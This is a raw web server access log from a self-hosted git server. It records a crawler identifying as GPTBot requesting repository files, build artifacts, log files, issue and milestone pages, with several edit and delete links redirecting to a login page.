"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 44560] [Gzip 32.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 28984] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2?display=source" [Client 74.7.227.38] [Length 31306] [Gzip 6.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:16:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log?display=source" [Client 74.7.227.38] [Length 11413] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" +[17/Feb/2026:16:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4?display=source" [Client 74.7.227.38] [Length 23736] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:16:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 11126] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" +[17/Feb/2026:16:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11790] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" +[17/Feb/2026:16:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=name&state=open" [Client 74.7.227.38] [Length 8487] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" +[17/Feb/2026:16:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/projects?q=&sort=oldest&state=open" [Client 74.7.227.38] [Length 7804] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/projects" +[17/Feb/2026:16:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?state=closed" [Client 74.7.227.38] [Length 8481] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" +[17/Feb/2026:16:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:16:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13192] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" +[17/Feb/2026:16:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" +[17/Feb/2026:16:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?files=C%2b%2bProject" [Client 74.7.227.38] [Length 15219] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" +[17/Feb/2026:16:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11895] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:36:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:16:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:16:36:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:16:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:16:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:16:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 17667] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:16:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?state=open" [Client 74.7.227.38] [Length 8473] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?state=closed" +[17/Feb/2026:16:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10131] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" +[17/Feb/2026:16:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11897] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11894] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg?display=source" [Client 74.7.227.38] [Length 14137] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:16:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" +[17/Feb/2026:16:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:16:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11650] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" +[17/Feb/2026:16:36:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:36:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" +[17/Feb/2026:16:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11768] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" +[17/Feb/2026:16:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11769] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" +[17/Feb/2026:16:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11739] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" +[17/Feb/2026:16:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11769] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" +[17/Feb/2026:16:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=leastissues&state=closed" [Client 74.7.227.38] [Length 8515] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=leastissues&state=open" +[17/Feb/2026:16:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=leastcomplete&state=open" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=leastcomplete&state=closed" +[17/Feb/2026:16:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:16:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=mostissues&state=closed" [Client 74.7.227.38] [Length 8516] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=mostissues&state=open" +[17/Feb/2026:16:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=leastissues&state=open" [Client 74.7.227.38] [Length 8502] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=leastissues&state=closed" +[17/Feb/2026:16:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=mostcomplete&state=open" [Client 74.7.227.38] [Length 8512] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=mostcomplete&state=closed" +[17/Feb/2026:16:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=mostcomplete&state=all" [Client 74.7.227.38] [Length 8510] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=mostcomplete&state=open" +[17/Feb/2026:16:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=leastcomplete&state=all" [Client 74.7.227.38] [Length 8505] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=leastcomplete&state=open" +[17/Feb/2026:16:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 9845] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:16:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 9846] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:16:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9845] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:16:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 9852] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:16:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 9843] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:16:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:16:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:16:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 9853] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:16:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 9846] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 